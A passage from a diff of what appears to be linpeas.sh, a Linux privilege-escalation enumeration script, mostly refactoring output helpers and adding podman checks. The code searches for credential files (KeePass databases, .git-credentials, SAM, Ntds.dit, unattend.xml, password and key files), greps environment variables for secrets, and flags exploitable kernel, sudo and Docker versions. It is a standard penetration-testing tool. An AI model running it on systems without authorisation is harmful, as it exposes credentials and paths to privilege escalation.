"^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) + PSTORAGE_SVN=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.svn$" | sort | uniq | head -n 70) + PSTORAGE_KEEPASS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) + PSTORAGE_FTP=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|ws_ftp\.ini$" | sort | uniq | head -n 70) + PSTORAGE_BIND=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "bind$" | sort | uniq | head -n 70) + PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "seeddms.*$" | sort | uniq | head -n 70) + PSTORAGE_DDCLIENT=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) + PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) + PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) + PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|php\.ini$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security$|security\.sav$|server\.xml$|services\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) + PSTORAGE_DATABASE=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) + PSTORAGE_BACKUPS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "backup$|backups$" | sort | uniq | head -n 70) + PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) + + ##### POST SERACH VARIABLES ##### - backup_folders=`echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS" | tr ' ' '\n' | grep -v "/lib" | grep -E "backup$|backups$"` - backup_folders_row="`echo $backup_folders | tr '\n' ' '`" - printf $Y"DONE\n"$NC + backup_folders_row="`echo $PSTORAGE_BACKUPS | tr '\n' ' '`" + printf ${YELLOW}"DONE\n"$NC echo "" fi @@ -1099,27 +1181,27 @@ if [ "`echo $CHECKS | grep SysI`" ]; then ########################################### #-------------) System Info (-------------# ########################################### - printf $B"════════════════════════════════════╣ "$GREEN"System Information"$B" ╠════════════════════════════════════\n"$NC + print_title "System Information" #-- SY) OS - printf $Y"[+] "$GREEN"Operative system\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits\n"$NC -(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel7,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelB,${C}[1;31m&${C}[0m," + print_2title "Operative system" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" + (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," lsb_release -a 2>/dev/null echo "" - #-- SY) Sudo - printf $Y"[+] "$GREEN"Sudo version\n"$NC + #-- SY) Sudo + print_2title "Sudo version" if [ "`command -v sudo 2>/dev/null`" ]; then - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version\n"$NC - sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${C}[1;31m&${C}[0m," + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" + sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," else echo_not_found "sudo" fi echo "" #--SY) USBCreator - printf $Y"[+] "$GREEN"USBCreator\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation\n"$NC + print_2title "USBCreator" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") if [ -z "$pc_version" ]; then @@ -1130,53 +1212,54 @@ if [ "`echo $CHECKS | grep SysI`" ]; then pc_major=$(echo "$pc_version" | cut -d. -f1) pc_minor=$(echo "$pc_version" | cut -d. -f2) if [ $pc_length -eq 4 -a $pc_major -eq 0 -a $pc_minor -lt 21 ]; then - echo "Vulnerable!!" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," fi fi fi echo "" #-- SY) PATH - printf $Y"[+] "$GREEN"PATH\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses\n"$NC - echo $OLDPATH 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${C}[1;31;103m&${C}[0m,g" - echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${C}[1;31;103m&${C}[0m,g" + print_2title "PATH" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" + echo $OLDPATH 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" + echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" echo "" #-- SY) Date - printf $Y"[+] "$GREEN"Date\n"$NC + print_2title "Date" date 2>/dev/null || echo_not_found "date" echo "" #-- SY) System stats - printf $Y"[+] "$GREEN"System stats\n"$NC + print_2title "System stats" (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" free 2>/dev/null || echo_not_found "free" echo "" - + #-- SY) CPU info - printf $Y"[+] "$GREEN"CPU info\n"$NC + print_2title "CPU info" lscpu 2>/dev/null || echo_not_found "lscpu" echo "" - #-- SY) Environment vars - printf $Y"[+] "$GREEN"Environment\n"$NC - printf $B"[i] "$Y"Any private information inside environment variables?\n"$NC - (env || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|sudocapsB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY],${C}[1;31m&${C}[0m,g" || echo_not_found "env || set" + #-- SY) Environment vars + print_2title "Environment" + print_info "Any private information inside environment variables?" + (env || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|sudocapsB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY],${SED_RED},g" || echo_not_found "env || set" echo "" #-- SY) Dmesg - printf $Y"[+] "$GREEN"Searching Signature verification failed in dmseg\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed\n"$NC + print_2title "Searching Signature verification failed in dmseg" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" (dmesg 2>/dev/null | grep "signature") || echo_not_found echo "" #-- SY) AppArmor - printf $Y"[+] "$GREEN"AppArmor enabled? .............. "$NC + print_2title "Linux Protections" + print_list "AppArmor enabled? .............. "$NC if [ `command -v aa-status 2>/dev/null` ]; then - aa-status 2>&1 | sed "s,disabled,${C}[1;31m&${C}[0m," + aa-status 2>&1 | sed "s,disabled,${SED_RED}," elif [ `command -v apparmor_status 2>/dev/null` ]; then - apparmor_status 2>&1 | sed "s,disabled,${C}[1;31m&${C}[0m," + apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then ls -d /etc/apparmor* else @@ -1184,37 +1267,37 @@ if [ "`echo $CHECKS | grep SysI`" ]; then fi #-- SY) grsecurity - printf $Y"[+] "$GREEN"grsecurity present? ............ "$NC + print_list "grsecurity present? ............ "$NC ((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") #-- SY) PaX - printf $Y"[+] "$GREEN"PaX bins present? .............. "$NC - (which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") + print_list "PaX bins present? .............. "$NC + (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") #-- SY) Execshield - printf $Y"[+] "$GREEN"Execshield enabled? ............ "$NC - (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${C}[1;31m&${C}[0m," + print_list "Execshield enabled? ............ "$NC + (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," #-- SY) SElinux - printf $Y"[+] "$GREEN"SELinux enabled? ............... "$NC - (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${C}[1;31m&${C}[0m," + print_list "SELinux enabled? ............... "$NC + (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," #-- SY) ASLR - printf $Y"[+] "$GREEN"Is ASLR enabled? ............... "$NC + print_list "Is ASLR enabled? ............... "$NC ASLR=`cat /proc/sys/kernel/randomize_va_space 2>/dev/null` - if [ -z "$ASLR" ]; then - echo_not_found "/proc/sys/kernel/randomize_va_space"; + if [ -z "$ASLR" ]; then + echo_not_found "/proc/sys/kernel/randomize_va_space"; else if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi echo "" fi #-- SY) Printer - printf $Y"[+] "$GREEN"Printer? ....................... "$NC + print_list "Printer? ....................... "$NC lpstat -a 2>/dev/null || echo_not_found "lpstat" - + #-- SY) Running in a virtual environment - printf $Y"[+] "$GREEN"Is this a virtual machine? ..... "$NC + print_list "Is this a virtual machine? ..... "$NC hypervisorflag=`cat /proc/cpuinfo 2>/dev/null | grep flags | grep hypervisor` if [ `command -v systemd-detect-virt 2>/dev/null` ]; then detectedvirt=`systemd-detect-virt` @@ -1232,86 +1315,92 @@ if [ "`echo $CHECKS | grep Container`" ]; then ############################################## #---------------) Containers (---------------# ############################################## - printf $B"═════════════════════════════════════════╣ "$GREEN"Containers"$B" ╠══════════════════════════════════════════\n"$NC + print_title "Containers" containerCheck - printf $Y"[+] "$GREEN"Is this a container? ...........$NC $containerType\n" - - printf $Y"[+] "$GREEN"Container related tools present\n"$NC - which $CONTAINER_CMDS - printf $Y"[+] "$GREEN"Any running containers? ........ "$NC + print_2title "Container related tools present" + command -v $CONTAINER_CMDS + + print_2title "Container details" + print_list "Is this a container? ...........$NC $containerType" + + print_list "Any running containers? ........ "$NC # Get counts of running containers for each platform dockercontainers=`docker ps --format "{{.Names}}" 2>/dev/null | wc -l` + podmancontainers=`podman ps --format "{{.Names}}" 2>/dev/null | wc -l` lxccontainers=`lxc list -c n --format csv 2>/dev/null | wc -l` rktcontainers=`rkt list 2>/dev/null | tail -n +2 | wc -l` - if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ]; then + if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then echo_no else containerCounts="" if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi + if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi - echo "Yes $containerCounts" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," # List any running containers - if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; docker ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; lxc list 2>/dev/null; echo ""; fi - if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; rkt list 2>/dev/null; echo ""; fi + if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi + if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi + if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi + if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi fi - + #If docker if [ "`echo \"$containerType\" | grep -i \"docker\"`" ]; then + print_2title "Docker Container details" inDockerGroup - printf $Y"[+] "$GREEN"Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${C}[1;31;103m&${C}[0m," - printf $Y"[+] "$GREEN"Looking and enumerating Docker Sockets\n"$NC + print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Looking and enumerating Docker Sockets\n"$NC enumerateDockerSockets - printf $Y"[+] "$GREEN"Docker version .................$NC$dockerVersion" + print_list "Docker version .................$NC$dockerVersion" checkDockerVersionExploits - printf $Y"[+] "$GREEN"Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${C}[1;31;103m&${C}[0m," - printf $Y"[+] "$GREEN"Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${C}[1;31;103m&${C}[0m," + print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," if [ "$inContainer" ]; then checkDockerRootless - printf $Y"[+] "$GREEN"Rooless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${C}[1;31m&${C}[0m," | sed -${E} "s,Yes,${C}[1;32m&${C}[0m," + print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," fi fi if [ "$inContainer" ]; then echo "" - printf $Y"[+] "$GREEN"Container & breakout enumeration\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout\n"$NC - printf $Y"[+] "$GREEN"Container ID ...................$NC `cat /etc/hostname`\n" + print_2title "Container & breakout enumeration" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" + print_list "Container ID ...................$NC" `cat /etc/hostname` if [ "`echo \"$containerType\" | grep -i \"docker\"`" ]; then - printf $Y"[+] "$GREEN"Container Full ID ..............$NC `basename \"$(cat 